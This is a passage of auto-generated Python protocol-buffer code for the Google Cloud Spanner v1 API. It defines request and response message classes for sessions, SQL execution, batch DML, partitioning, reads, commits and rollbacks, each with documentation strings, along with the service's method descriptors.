DESCRIPTOR.message_types_by_name["PartitionOptions"] = _PARTITIONOPTIONS
DESCRIPTOR.message_types_by_name["PartitionQueryRequest"] = _PARTITIONQUERYREQUEST
DESCRIPTOR.message_types_by_name["PartitionReadRequest"] = _PARTITIONREADREQUEST
DESCRIPTOR.message_types_by_name["Partition"] = _PARTITION
DESCRIPTOR.message_types_by_name["PartitionResponse"] = _PARTITIONRESPONSE
DESCRIPTOR.message_types_by_name["ReadRequest"] = _READREQUEST
DESCRIPTOR.message_types_by_name["BeginTransactionRequest"] = _BEGINTRANSACTIONREQUEST
DESCRIPTOR.message_types_by_name["CommitRequest"] = _COMMITREQUEST
DESCRIPTOR.message_types_by_name["CommitResponse"] = _COMMITRESPONSE
DESCRIPTOR.message_types_by_name["RollbackRequest"] = _ROLLBACKREQUEST
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
CreateSessionRequest = _reflection.GeneratedProtocolMessageType(
"CreateSessionRequest",
(_message.Message,),
dict(
DESCRIPTOR=_CREATESESSIONREQUEST,
__module__="google.cloud.spanner_v1.proto.spanner_pb2",
__doc__="""The request for
[CreateSession][google.spanner.v1.Spanner.CreateSession].
Attributes:
database:
Required. The database in which the new session is created.
session:
The session to create.
""",
# @@protoc_insertion_point(class_scope:google.spanner.v1.CreateSessionRequest)
),
)
_sym_db.RegisterMessage(CreateSessionRequest)
BatchCreateSessionsRequest = _reflection.GeneratedProtocolMessageType(
"BatchCreateSessionsRequest",
(_message.Message,),
dict(
DESCRIPTOR=_BATCHCREATESESSIONSREQUEST,
__module__="google.cloud.spanner_v1.proto.spanner_pb2",
__doc__="""The request for
[BatchCreateSessions][google.spanner.v1.Spanner.BatchCreateSessions].
Attributes:
database:
Required. The database in which the new sessions are created.
session_template:
Parameters to be applied to each created session.
session_count:
Required. The number of sessions to be created in this batch
call. The API may return fewer than the requested number of
sessions. If a specific number of sessions are desired, the
client can make additional calls to BatchCreateSessions
(adjusting [session\_count][google.spanner.v1.BatchCreateSessi
onsRequest.session\_count] as necessary).
""",
# @@protoc_insertion_point(class_scope:google.spanner.v1.BatchCreateSessionsRequest)
),
)
_sym_db.RegisterMessage(BatchCreateSessionsRequest)
BatchCreateSessionsResponse = _reflection.GeneratedProtocolMessageType(
"BatchCreateSessionsResponse",
(_message.Message,),
dict(
DESCRIPTOR=_BATCHCREATESESSIONSRESPONSE,
__module__="google.cloud.spanner_v1.proto.spanner_pb2",
__doc__="""The response for
[BatchCreateSessions][google.spanner.v1.Spanner.BatchCreateSessions].
Attributes:
session:
The freshly created sessions.
""",
# @@protoc_insertion_point(class_scope:google.spanner.v1.BatchCreateSessionsResponse)
),
)
_sym_db.RegisterMessage(BatchCreateSessionsResponse)
Session = _reflection.GeneratedProtocolMessageType(
"Session",
(_message.Message,),
dict(
LabelsEntry=_reflection.GeneratedProtocolMessageType(
"LabelsEntry",
(_message.Message,),
dict(
DESCRIPTOR=_SESSION_LABELSENTRY,
__module__="google.cloud.spanner_v1.proto.spanner_pb2"
# @@protoc_insertion_point(class_scope:google.spanner.v1.Session.LabelsEntry)
),
),
DESCRIPTOR=_SESSION,
__module__="google.cloud.spanner_v1.proto.spanner_pb2",
__doc__="""A session in the Cloud Spanner API.
Attributes:
name:
The name of the session. This is always system-assigned;
values provided when creating a session are ignored.
labels:
The labels for the session. - Label keys must be between 1
and 63 characters long and must conform to the following
regular expression: ``[a-z]([-a-z0-9]*[a-z0-9])?``. - Label
values must be between 0 and 63 characters long and must
conform to the regular expression
``([a-z]([-a-z0-9]*[a-z0-9])?)?``. - No more than 64 labels
can be associated with a given session. See
https://goo.gl/xmQnxf for more information on and examples of
labels.
create_time:
Output only. The timestamp when the session is created.
approximate_last_use_time:
Output only. The approximate timestamp when the session is
last used. It is typically earlier than the actual last use
time.
""",
# @@protoc_insertion_point(class_scope:google.spanner.v1.Session)
),
)
_sym_db.RegisterMessage(Session)
_sym_db.RegisterMessage(Session.LabelsEntry)
GetSessionRequest = _reflection.GeneratedProtocolMessageType(
"GetSessionRequest",
(_message.Message,),
dict(
DESCRIPTOR=_GETSESSIONREQUEST,
__module__="google.cloud.spanner_v1.proto.spanner_pb2",
__doc__="""The request for
[GetSession][google.spanner.v1.Spanner.GetSession].
Attributes:
name:
Required. The name of the session to retrieve.
""",
# @@protoc_insertion_point(class_scope:google.spanner.v1.GetSessionRequest)
),
)
_sym_db.RegisterMessage(GetSessionRequest)
ListSessionsRequest = _reflection.GeneratedProtocolMessageType(
"ListSessionsRequest",
(_message.Message,),
dict(
DESCRIPTOR=_LISTSESSIONSREQUEST,
__module__="google.cloud.spanner_v1.proto.spanner_pb2",
__doc__="""The request for
[ListSessions][google.spanner.v1.Spanner.ListSessions].
Attributes:
database:
Required. The database in which to list sessions.
page_size:
Number of sessions to be returned in the response. If 0 or
less, defaults to the server's maximum allowed page size.
page_token:
If non-empty, ``page_token`` should contain a [next\_page\_tok
en][google.spanner.v1.ListSessionsResponse.next\_page\_token]
from a previous [ListSessionsResponse][google.spanner.v1.ListS
essionsResponse].
filter:
An expression for filtering the results of the request. Filter
rules are case insensitive. The fields eligible for filtering
are: - ``labels.key`` where key is the name of a label Some
examples of using filters are: - ``labels.env:*`` --> The
session has the label "env". - ``labels.env:dev`` --> The
session has the label "env" and the value of the label
contains the string "dev".
""",
# @@protoc_insertion_point(class_scope:google.spanner.v1.ListSessionsRequest)
),
)
_sym_db.RegisterMessage(ListSessionsRequest)
ListSessionsResponse = _reflection.GeneratedProtocolMessageType(
"ListSessionsResponse",
(_message.Message,),
dict(
DESCRIPTOR=_LISTSESSIONSRESPONSE,
__module__="google.cloud.spanner_v1.proto.spanner_pb2",
__doc__="""The response for
[ListSessions][google.spanner.v1.Spanner.ListSessions].
Attributes:
sessions:
The list of requested sessions.
next_page_token:
\ ``next_page_token`` can be sent in a subsequent
[ListSessions][google.spanner.v1.Spanner.ListSessions] call to
fetch more of the matching sessions.
""",
# @@protoc_insertion_point(class_scope:google.spanner.v1.ListSessionsResponse)
),
)
_sym_db.RegisterMessage(ListSessionsResponse)
DeleteSessionRequest = _reflection.GeneratedProtocolMessageType(
"DeleteSessionRequest",
(_message.Message,),
dict(
DESCRIPTOR=_DELETESESSIONREQUEST,
__module__="google.cloud.spanner_v1.proto.spanner_pb2",
__doc__="""The request for
[DeleteSession][google.spanner.v1.Spanner.DeleteSession].
Attributes:
name:
Required. The name of the session to delete.
""",
# @@protoc_insertion_point(class_scope:google.spanner.v1.DeleteSessionRequest)
),
)
_sym_db.RegisterMessage(DeleteSessionRequest)
ExecuteSqlRequest = _reflection.GeneratedProtocolMessageType(
"ExecuteSqlRequest",
(_message.Message,),
dict(
QueryOptions=_reflection.GeneratedProtocolMessageType(
"QueryOptions",
(_message.Message,),
dict(
DESCRIPTOR=_EXECUTESQLREQUEST_QUERYOPTIONS,
__module__="google.cloud.spanner_v1.proto.spanner_pb2",
__doc__="""Query optimizer configuration.
Attributes:
optimizer_version:
An option to control the selection of optimizer version. This
parameter allows individual queries to pick different query
optimizer versions. Specifying "latest" as a value instructs
Cloud Spanner to use the latest supported query optimizer
version. If not specified, Cloud Spanner uses optimizer
version set at the database level options. Any other positive
integer (from the list of supported optimizer versions)
overrides the default optimizer version for query execution.
The list of supported optimizer versions can be queried from
SPANNER\_SYS.SUPPORTED\_OPTIMIZER\_VERSIONS. Executing a SQL
statement with an invalid optimizer version will fail with a
syntax error (``INVALID_ARGUMENT``) status. The
``optimizer_version`` statement hint has precedence over this
setting.
""",
# @@protoc_insertion_point(class_scope:google.spanner.v1.ExecuteSqlRequest.QueryOptions)
),
),
ParamTypesEntry=_reflection.GeneratedProtocolMessageType(
"ParamTypesEntry",
(_message.Message,),
dict(
DESCRIPTOR=_EXECUTESQLREQUEST_PARAMTYPESENTRY,
__module__="google.cloud.spanner_v1.proto.spanner_pb2"
# @@protoc_insertion_point(class_scope:google.spanner.v1.ExecuteSqlRequest.ParamTypesEntry)
),
),
DESCRIPTOR=_EXECUTESQLREQUEST,
__module__="google.cloud.spanner_v1.proto.spanner_pb2",
__doc__="""The request for
[ExecuteSql][google.spanner.v1.Spanner.ExecuteSql] and
[ExecuteStreamingSql][google.spanner.v1.Spanner.ExecuteStreamingSql].
Attributes:
session:
Required. The session in which the SQL query should be
performed.
transaction:
The transaction to use. For queries, if none is provided, the
default is a temporary read-only transaction with strong
concurrency. Standard DML statements require a read-write
transaction. To protect against replays, single-use
transactions are not supported. The caller must either supply
an existing transaction ID or begin a new transaction.
Partitioned DML requires an existing Partitioned DML
transaction ID.
sql:
Required. The SQL string.
params:
Parameter names and values that bind to placeholders in the
SQL string. A parameter placeholder consists of the ``@``
character followed by the parameter name (for example,
``@firstName``). Parameter names can contain letters, numbers,
and underscores. Parameters can appear anywhere that a
literal value is expected. The same parameter name can be used
more than once, for example: ``"WHERE id > @msg_id AND id <
@msg_id + 100"`` It is an error to execute a SQL statement
with unbound parameters.
param_types:
It is not always possible for Cloud Spanner to infer the right
SQL type from a JSON value. For example, values of type
``BYTES`` and values of type ``STRING`` both appear in
[params][google.spanner.v1.ExecuteSqlRequest.params] as JSON
strings. In these cases, ``param_types`` can be used to
specify the exact SQL type for some or all of the SQL
statement parameters. See the definition of
[Type][google.spanner.v1.Type] for more information about SQL
types.
resume_token:
If this request is resuming a previously interrupted SQL
statement execution, ``resume_token`` should be copied from
the last
[PartialResultSet][google.spanner.v1.PartialResultSet] yielded
before the interruption. Doing this enables the new SQL
statement execution to resume where the last one left off. The
rest of the request parameters must exactly match the request
that yielded this token.
query_mode:
Used to control the amount of debugging information returned
in [ResultSetStats][google.spanner.v1.ResultSetStats]. If [par
tition\_token][google.spanner.v1.ExecuteSqlRequest.partition\_
token] is set,
[query\_mode][google.spanner.v1.ExecuteSqlRequest.query\_mode]
can only be set to [QueryMode.NORMAL][google.spanner.v1.Execut
eSqlRequest.QueryMode.NORMAL].
partition_token:
If present, results will be restricted to the specified
partition previously created using PartitionQuery(). There
must be an exact match for the values of fields common to this
message and the PartitionQueryRequest message used to create
this partition\_token.
seqno:
A per-transaction sequence number used to identify this
request. This field makes each request idempotent such that if
the request is received multiple times, at most one will
succeed. The sequence number must be monotonically increasing
within the transaction. If a request arrives for the first
time with an out-of-order sequence number, the transaction may
be aborted. Replays of previously handled requests will yield
the same response as the first execution. Required for DML
statements. Ignored for queries.
query_options:
Query optimizer configuration to use for the given query.
""",
# @@protoc_insertion_point(class_scope:google.spanner.v1.ExecuteSqlRequest)
),
)
_sym_db.RegisterMessage(ExecuteSqlRequest)
_sym_db.RegisterMessage(ExecuteSqlRequest.QueryOptions)
_sym_db.RegisterMessage(ExecuteSqlRequest.ParamTypesEntry)
ExecuteBatchDmlRequest = _reflection.GeneratedProtocolMessageType(
"ExecuteBatchDmlRequest",
(_message.Message,),
dict(
Statement=_reflection.GeneratedProtocolMessageType(
"Statement",
(_message.Message,),
dict(
ParamTypesEntry=_reflection.GeneratedProtocolMessageType(
"ParamTypesEntry",
(_message.Message,),
dict(
DESCRIPTOR=_EXECUTEBATCHDMLREQUEST_STATEMENT_PARAMTYPESENTRY,
__module__="google.cloud.spanner_v1.proto.spanner_pb2"
# @@protoc_insertion_point(class_scope:google.spanner.v1.ExecuteBatchDmlRequest.Statement.ParamTypesEntry)
),
),
DESCRIPTOR=_EXECUTEBATCHDMLREQUEST_STATEMENT,
__module__="google.cloud.spanner_v1.proto.spanner_pb2",
__doc__="""A single DML statement.
Attributes:
sql:
Required. The DML string.
params:
Parameter names and values that bind to placeholders in the
DML string. A parameter placeholder consists of the ``@``
character followed by the parameter name (for example,
``@firstName``). Parameter names can contain letters, numbers,
and underscores. Parameters can appear anywhere that a
literal value is expected. The same parameter name can be used
more than once, for example: ``"WHERE id > @msg_id AND id <
@msg_id + 100"`` It is an error to execute a SQL statement
with unbound parameters.
param_types:
It is not always possible for Cloud Spanner to infer the right
SQL type from a JSON value. For example, values of type
``BYTES`` and values of type ``STRING`` both appear in [params
][google.spanner.v1.ExecuteBatchDmlRequest.Statement.params]
as JSON strings. In these cases, ``param_types`` can be used
to specify the exact SQL type for some or all of the SQL
statement parameters. See the definition of
[Type][google.spanner.v1.Type] for more information about SQL
types.
""",
# @@protoc_insertion_point(class_scope:google.spanner.v1.ExecuteBatchDmlRequest.Statement)
),
),
DESCRIPTOR=_EXECUTEBATCHDMLREQUEST,
__module__="google.cloud.spanner_v1.proto.spanner_pb2",
__doc__="""The request for
[ExecuteBatchDml][google.spanner.v1.Spanner.ExecuteBatchDml].
Attributes:
session:
Required. The session in which the DML statements should be
performed.
transaction:
Required. The transaction to use. Must be a read-write
transaction. To protect against replays, single-use
transactions are not supported. The caller must either supply
an existing transaction ID or begin a new transaction.
statements:
Required. The list of statements to execute in this batch.
Statements are executed serially, such that the effects of
statement ``i`` are visible to statement ``i+1``. Each
statement must be a DML statement. Execution stops at the
first failed statement; the remaining statements are not
executed. Callers must provide at least one statement.
seqno:
Required. A per-transaction sequence number used to identify
this request. This field makes each request idempotent such
that if the request is received multiple times, at most one
will succeed. The sequence number must be monotonically
increasing within the transaction. If a request arrives for
the first time with an out-of-order sequence number, the
transaction may be aborted. Replays of previously handled
requests will yield the same response as the first execution.
""",
# @@protoc_insertion_point(class_scope:google.spanner.v1.ExecuteBatchDmlRequest)
),
)
_sym_db.RegisterMessage(ExecuteBatchDmlRequest)
_sym_db.RegisterMessage(ExecuteBatchDmlRequest.Statement)
_sym_db.RegisterMessage(ExecuteBatchDmlRequest.Statement.ParamTypesEntry)
ExecuteBatchDmlResponse = _reflection.GeneratedProtocolMessageType(
"ExecuteBatchDmlResponse",
(_message.Message,),
dict(
DESCRIPTOR=_EXECUTEBATCHDMLRESPONSE,
__module__="google.cloud.spanner_v1.proto.spanner_pb2",
__doc__="""The response for
[ExecuteBatchDml][google.spanner.v1.Spanner.ExecuteBatchDml]. Contains a
list of [ResultSet][google.spanner.v1.ResultSet] messages, one for each
DML statement that has successfully executed, in the same order as the
statements in the request. If a statement fails, the status in the
response body identifies the cause of the failure.
To check for DML statements that failed, use the following approach:
1. Check the status in the response message. The
[google.rpc.Code][google.rpc.Code] enum value ``OK`` indicates that
all statements were executed successfully.
2. If the status was not ``OK``, check the number of result sets in the
response. If the response contains ``N``
[ResultSet][google.spanner.v1.ResultSet] messages, then statement
``N+1`` in the request failed.
Example 1:
- Request: 5 DML statements, all executed successfully.
- Response: 5 [ResultSet][google.spanner.v1.ResultSet] messages, with
the status ``OK``.
Example 2:
- Request: 5 DML statements. The third statement has a syntax error.
- Response: 2 [ResultSet][google.spanner.v1.ResultSet] messages, and a
syntax error (``INVALID_ARGUMENT``) status. The number of
[ResultSet][google.spanner.v1.ResultSet] messages indicates that the
third statement failed, and the fourth and fifth statements were not
executed.
Attributes:
result_sets:
One [ResultSet][google.spanner.v1.ResultSet] for each
statement in the request that ran successfully, in the same
order as the statements in the request. Each
[ResultSet][google.spanner.v1.ResultSet] does not contain any
rows. The [ResultSetStats][google.spanner.v1.ResultSetStats]
in each [ResultSet][google.spanner.v1.ResultSet] contain the
number of rows modified by the statement. Only the first
[ResultSet][google.spanner.v1.ResultSet] in the response
contains valid
[ResultSetMetadata][google.spanner.v1.ResultSetMetadata].
status:
If all DML statements are executed successfully, the status is
``OK``. Otherwise, the error status of the first failed
statement.
""",
# @@protoc_insertion_point(class_scope:google.spanner.v1.ExecuteBatchDmlResponse)
),
)
_sym_db.RegisterMessage(ExecuteBatchDmlResponse)
PartitionOptions = _reflection.GeneratedProtocolMessageType(
"PartitionOptions",
(_message.Message,),
dict(
DESCRIPTOR=_PARTITIONOPTIONS,
__module__="google.cloud.spanner_v1.proto.spanner_pb2",
__doc__="""Options for a PartitionQueryRequest and
PartitionReadRequest.
Attributes:
partition_size_bytes:
\ **Note:** This hint is currently ignored by PartitionQuery
and PartitionRead requests. The desired data size for each
partition generated. The default for this option is currently
1 GiB. This is only a hint. The actual size of each partition
may be smaller or larger than this size request.
max_partitions:
\ **Note:** This hint is currently ignored by PartitionQuery
and PartitionRead requests. The desired maximum number of
partitions to return. For example, this may be set to the
number of workers available. The default for this option is
currently 10,000. The maximum value is currently 200,000. This
is only a hint. The actual number of partitions returned may
be smaller or larger than this maximum count request.
""",
# @@protoc_insertion_point(class_scope:google.spanner.v1.PartitionOptions)
),
)
_sym_db.RegisterMessage(PartitionOptions)
PartitionQueryRequest = _reflection.GeneratedProtocolMessageType(
"PartitionQueryRequest",
(_message.Message,),
dict(
ParamTypesEntry=_reflection.GeneratedProtocolMessageType(
"ParamTypesEntry",
(_message.Message,),
dict(
DESCRIPTOR=_PARTITIONQUERYREQUEST_PARAMTYPESENTRY,
__module__="google.cloud.spanner_v1.proto.spanner_pb2"
# @@protoc_insertion_point(class_scope:google.spanner.v1.PartitionQueryRequest.ParamTypesEntry)
),
),
DESCRIPTOR=_PARTITIONQUERYREQUEST,
__module__="google.cloud.spanner_v1.proto.spanner_pb2",
__doc__="""The request for
[PartitionQuery][google.spanner.v1.Spanner.PartitionQuery]
Attributes:
session:
Required. The session used to create the partitions.
transaction:
Read only snapshot transactions are supported, read/write and
single use transactions are not.
sql:
Required. The query request to generate partitions for. The
request will fail if the query is not root partitionable. The
query plan of a root partitionable query has a single
distributed union operator. A distributed union operator
conceptually divides one or more tables into multiple splits,
remotely evaluates a subquery independently on each split, and
then unions all results. This must not contain DML commands,
such as INSERT, UPDATE, or DELETE. Use [ExecuteStreamingSql][g
oogle.spanner.v1.Spanner.ExecuteStreamingSql] with a
PartitionedDml transaction for large, partition-friendly DML
operations.
params:
Parameter names and values that bind to placeholders in the
SQL string. A parameter placeholder consists of the ``@``
character followed by the parameter name (for example,
``@firstName``). Parameter names can contain letters, numbers,
and underscores. Parameters can appear anywhere that a
literal value is expected. The same parameter name can be used
more than once, for example: ``"WHERE id > @msg_id AND id <
@msg_id + 100"`` It is an error to execute a SQL statement
with unbound parameters.
param_types:
It is not always possible for Cloud Spanner to infer the right
SQL type from a JSON value. For example, values of type
``BYTES`` and values of type ``STRING`` both appear in
[params][google.spanner.v1.PartitionQueryRequest.params] as
JSON strings. In these cases, ``param_types`` can be used to
specify the exact SQL type for some or all of the SQL query
parameters. See the definition of
[Type][google.spanner.v1.Type] for more information about SQL
types.
partition_options:
Additional options that affect how many partitions are
created.
""",
# @@protoc_insertion_point(class_scope:google.spanner.v1.PartitionQueryRequest)
),
)
_sym_db.RegisterMessage(PartitionQueryRequest)
_sym_db.RegisterMessage(PartitionQueryRequest.ParamTypesEntry)
PartitionReadRequest = _reflection.GeneratedProtocolMessageType(
"PartitionReadRequest",
(_message.Message,),
dict(
DESCRIPTOR=_PARTITIONREADREQUEST,
__module__="google.cloud.spanner_v1.proto.spanner_pb2",
__doc__="""The request for
[PartitionRead][google.spanner.v1.Spanner.PartitionRead]
Attributes:
session:
Required. The session used to create the partitions.
transaction:
Read only snapshot transactions are supported, read/write and
single use transactions are not.
table:
Required. The name of the table in the database to be read.
index:
If non-empty, the name of an index on
[table][google.spanner.v1.PartitionReadRequest.table]. This
index is used instead of the table primary key when
interpreting
[key\_set][google.spanner.v1.PartitionReadRequest.key\_set]
and sorting result rows. See
[key\_set][google.spanner.v1.PartitionReadRequest.key\_set]
for further information.
columns:
The columns of
[table][google.spanner.v1.PartitionReadRequest.table] to be
returned for each row matching this request.
key_set:
Required. ``key_set`` identifies the rows to be yielded.
``key_set`` names the primary keys of the rows in
[table][google.spanner.v1.PartitionReadRequest.table] to be
yielded, unless
[index][google.spanner.v1.PartitionReadRequest.index] is
present. If
[index][google.spanner.v1.PartitionReadRequest.index] is
present, then
[key\_set][google.spanner.v1.PartitionReadRequest.key\_set]
instead names index keys in
[index][google.spanner.v1.PartitionReadRequest.index]. It is
not an error for the ``key_set`` to name rows that do not
exist in the database. Read yields nothing for nonexistent
rows.
partition_options:
Additional options that affect how many partitions are
created.
""",
# @@protoc_insertion_point(class_scope:google.spanner.v1.PartitionReadRequest)
),
)
_sym_db.RegisterMessage(PartitionReadRequest)
Partition = _reflection.GeneratedProtocolMessageType(
"Partition",
(_message.Message,),
dict(
DESCRIPTOR=_PARTITION,
__module__="google.cloud.spanner_v1.proto.spanner_pb2",
__doc__="""Information returned for each partition returned in a
PartitionResponse.
Attributes:
partition_token:
This token can be passed to Read, StreamingRead, ExecuteSql,
or ExecuteStreamingSql requests to restrict the results to
those identified by this partition token.
""",
# @@protoc_insertion_point(class_scope:google.spanner.v1.Partition)
),
)
_sym_db.RegisterMessage(Partition)
PartitionResponse = _reflection.GeneratedProtocolMessageType(
"PartitionResponse",
(_message.Message,),
dict(
DESCRIPTOR=_PARTITIONRESPONSE,
__module__="google.cloud.spanner_v1.proto.spanner_pb2",
__doc__="""The response for
[PartitionQuery][google.spanner.v1.Spanner.PartitionQuery] or
[PartitionRead][google.spanner.v1.Spanner.PartitionRead]
Attributes:
partitions:
Partitions created by this request.
transaction:
Transaction created by this request.
""",
# @@protoc_insertion_point(class_scope:google.spanner.v1.PartitionResponse)
),
)
_sym_db.RegisterMessage(PartitionResponse)
ReadRequest = _reflection.GeneratedProtocolMessageType(
"ReadRequest",
(_message.Message,),
dict(
DESCRIPTOR=_READREQUEST,
__module__="google.cloud.spanner_v1.proto.spanner_pb2",
__doc__="""The request for [Read][google.spanner.v1.Spanner.Read] and
[StreamingRead][google.spanner.v1.Spanner.StreamingRead].
Attributes:
session:
Required. The session in which the read should be performed.
transaction:
The transaction to use. If none is provided, the default is a
temporary read-only transaction with strong concurrency.
table:
Required. The name of the table in the database to be read.
index:
If non-empty, the name of an index on
[table][google.spanner.v1.ReadRequest.table]. This index is
used instead of the table primary key when interpreting
[key\_set][google.spanner.v1.ReadRequest.key\_set] and sorting
result rows. See
[key\_set][google.spanner.v1.ReadRequest.key\_set] for further
information.
columns:
Required. The columns of
[table][google.spanner.v1.ReadRequest.table] to be returned
for each row matching this request.
key_set:
Required. ``key_set`` identifies the rows to be yielded.
``key_set`` names the primary keys of the rows in
[table][google.spanner.v1.ReadRequest.table] to be yielded,
unless [index][google.spanner.v1.ReadRequest.index] is
present. If [index][google.spanner.v1.ReadRequest.index] is
present, then
[key\_set][google.spanner.v1.ReadRequest.key\_set] instead
names index keys in
[index][google.spanner.v1.ReadRequest.index]. If the [partiti
on\_token][google.spanner.v1.ReadRequest.partition\_token]
field is empty, rows are yielded in table primary key order
(if [index][google.spanner.v1.ReadRequest.index] is empty) or
index key order (if
[index][google.spanner.v1.ReadRequest.index] is non-empty). If
the [partition\_token][google.spanner.v1.ReadRequest.partition
\_token] field is not empty, rows will be yielded in an
unspecified order. It is not an error for the ``key_set`` to
name rows that do not exist in the database. Read yields
nothing for nonexistent rows.
limit:
If greater than zero, only the first ``limit`` rows are
yielded. If ``limit`` is zero, the default is no limit. A
limit cannot be specified if ``partition_token`` is set.
resume_token:
If this request is resuming a previously interrupted read,
``resume_token`` should be copied from the last
[PartialResultSet][google.spanner.v1.PartialResultSet] yielded
before the interruption. Doing this enables the new read to
resume where the last read left off. The rest of the request
parameters must exactly match the request that yielded this
token.
partition_token:
If present, results will be restricted to the specified
partition previously created using PartitionRead(). There must
be an exact match for the values of fields common to this
message and the PartitionReadRequest message used to create
this partition\_token.
""",
# @@protoc_insertion_point(class_scope:google.spanner.v1.ReadRequest)
),
)
_sym_db.RegisterMessage(ReadRequest)
BeginTransactionRequest = _reflection.GeneratedProtocolMessageType(
"BeginTransactionRequest",
(_message.Message,),
dict(
DESCRIPTOR=_BEGINTRANSACTIONREQUEST,
__module__="google.cloud.spanner_v1.proto.spanner_pb2",
__doc__="""The request for
[BeginTransaction][google.spanner.v1.Spanner.BeginTransaction].
Attributes:
session:
Required. The session in which the transaction runs.
options:
Required. Options for the new transaction.
""",
# @@protoc_insertion_point(class_scope:google.spanner.v1.BeginTransactionRequest)
),
)
_sym_db.RegisterMessage(BeginTransactionRequest)
CommitRequest = _reflection.GeneratedProtocolMessageType(
"CommitRequest",
(_message.Message,),
dict(
DESCRIPTOR=_COMMITREQUEST,
__module__="google.cloud.spanner_v1.proto.spanner_pb2",
__doc__="""The request for
[Commit][google.spanner.v1.Spanner.Commit].
Attributes:
session:
Required. The session in which the transaction to be committed
is running.
transaction:
Required. The transaction in which to commit.
transaction_id:
Commit a previously-started transaction.
single_use_transaction:
Execute mutations in a temporary transaction. Note that unlike
commit of a previously-started transaction, commit with a
temporary transaction is non-idempotent. That is, if the
``CommitRequest`` is sent to Cloud Spanner more than once (for
instance, due to retries in the application, or in the
transport library), it is possible that the mutations are
executed more than once. If this is undesirable, use
[BeginTransaction][google.spanner.v1.Spanner.BeginTransaction]
and [Commit][google.spanner.v1.Spanner.Commit] instead.
mutations:
The mutations to be executed when this transaction commits.
All mutations are applied atomically, in the order they appear
in this list.
""",
# @@protoc_insertion_point(class_scope:google.spanner.v1.CommitRequest)
),
)
_sym_db.RegisterMessage(CommitRequest)
CommitResponse = _reflection.GeneratedProtocolMessageType(
"CommitResponse",
(_message.Message,),
dict(
DESCRIPTOR=_COMMITRESPONSE,
__module__="google.cloud.spanner_v1.proto.spanner_pb2",
__doc__="""The response for
[Commit][google.spanner.v1.Spanner.Commit].
Attributes:
commit_timestamp:
The Cloud Spanner timestamp at which the transaction
committed.
""",
# @@protoc_insertion_point(class_scope:google.spanner.v1.CommitResponse)
),
)
_sym_db.RegisterMessage(CommitResponse)
RollbackRequest = _reflection.GeneratedProtocolMessageType(
"RollbackRequest",
(_message.Message,),
dict(
DESCRIPTOR=_ROLLBACKREQUEST,
__module__="google.cloud.spanner_v1.proto.spanner_pb2",
__doc__="""The request for
[Rollback][google.spanner.v1.Spanner.Rollback].
Attributes:
session:
Required. The session in which the transaction to roll back is
running.
transaction_id:
Required. The transaction to roll back.
""",
# @@protoc_insertion_point(class_scope:google.spanner.v1.RollbackRequest)
),
)
_sym_db.RegisterMessage(RollbackRequest)
DESCRIPTOR._options = None
_CREATESESSIONREQUEST.fields_by_name["database"]._options = None
_BATCHCREATESESSIONSREQUEST.fields_by_name["database"]._options = None
_BATCHCREATESESSIONSREQUEST.fields_by_name["session_count"]._options = None
_SESSION_LABELSENTRY._options = None
_SESSION._options = None
_GETSESSIONREQUEST.fields_by_name["name"]._options = None
_LISTSESSIONSREQUEST.fields_by_name["database"]._options = None
_DELETESESSIONREQUEST.fields_by_name["name"]._options = None
_EXECUTESQLREQUEST_PARAMTYPESENTRY._options = None
_EXECUTESQLREQUEST.fields_by_name["session"]._options = None
_EXECUTESQLREQUEST.fields_by_name["sql"]._options = None
_EXECUTEBATCHDMLREQUEST_STATEMENT_PARAMTYPESENTRY._options = None
_EXECUTEBATCHDMLREQUEST.fields_by_name["session"]._options = None
_EXECUTEBATCHDMLREQUEST.fields_by_name["transaction"]._options = None
_EXECUTEBATCHDMLREQUEST.fields_by_name["statements"]._options = None
_EXECUTEBATCHDMLREQUEST.fields_by_name["seqno"]._options = None
_PARTITIONQUERYREQUEST_PARAMTYPESENTRY._options = None
_PARTITIONQUERYREQUEST.fields_by_name["session"]._options = None
_PARTITIONQUERYREQUEST.fields_by_name["sql"]._options = None
_PARTITIONREADREQUEST.fields_by_name["session"]._options = None
_PARTITIONREADREQUEST.fields_by_name["table"]._options = None
_PARTITIONREADREQUEST.fields_by_name["key_set"]._options = None
_READREQUEST.fields_by_name["session"]._options = None
_READREQUEST.fields_by_name["table"]._options = None
_READREQUEST.fields_by_name["columns"]._options = None
_READREQUEST.fields_by_name["key_set"]._options = None
_BEGINTRANSACTIONREQUEST.fields_by_name["session"]._options = None
_BEGINTRANSACTIONREQUEST.fields_by_name["options"]._options = None
_COMMITREQUEST.fields_by_name["session"]._options = None
_ROLLBACKREQUEST.fields_by_name["session"]._options = None
_ROLLBACKREQUEST.fields_by_name["transaction_id"]._options = None
_SPANNER = _descriptor.ServiceDescriptor(
name="Spanner",
full_name="google.spanner.v1.Spanner",
file=DESCRIPTOR,
index=0,
serialized_options=_b(
"\312A\026spanner.googleapis.com\322A[https://www.googleapis.com/auth/cloud-platform,https://www.googleapis.com/auth/spanner.data"
),
serialized_start=4716,
serialized_end=7596,
methods=[
_descriptor.MethodDescriptor(
name="CreateSession",
full_name="google.spanner.v1.Spanner.CreateSession",
index=0,
containing_service=None,
input_type=_CREATESESSIONREQUEST,
output_type=_SESSION,
serialized_options=_b(
'\202\323\344\223\002?":/v1/{database=projects/*/instances/*/databases/*}/sessions:\001*\332A\010database'
),
),
_descriptor.MethodDescriptor(
name="BatchCreateSessions",
full_name="google.spanner.v1.Spanner.BatchCreateSessions",
index=1,
containing_service=None,
input_type=_BATCHCREATESESSIONSREQUEST,
output_type=_BATCHCREATESESSIONSRESPONSE,
serialized_options=_b(
'\202\323\344\223\002K"F/v1/{database=projects/*/instances/*/databases/*}/sessions:batchCreate:\001*\332A\026database,session_count'
),
),
_descriptor.MethodDescriptor(
name="GetSession",
full_name="google.spanner.v1.Spanner.GetSession",
index=2,
containing_service=None,
input_type=_GETSESSIONREQUEST,
output_type=_SESSION,
serialized_options=_b(
"\202\323\344\223\002:\0228/v1/{name=projects/*/instances/*/databases/*/sessions/*}\332A\004name"
),
),
_descriptor.MethodDescriptor(
name="ListSessions",
full_name="google.spanner.v1.Spanner.ListSessions",
index=3,
containing_service=None,
input_type=_LISTSESSIONSREQUEST,
output_type=_LISTSESSIONSRESPONSE,
serialized_options=_b(
"\202\323\344\223\002<\022:/v1/{database=projects/*/instances/*/databases/*}/sessions\332A\010database"
),
),
_descriptor.MethodDescriptor(
name="DeleteSession",
full_name="google.spanner.v1.Spanner.DeleteSession",
index=4,
containing_service=None,
input_type=_DELETESESSIONREQUEST,
output_type=google_dot_protobuf_dot_empty__pb2._EMPTY,
serialized_options=_b(
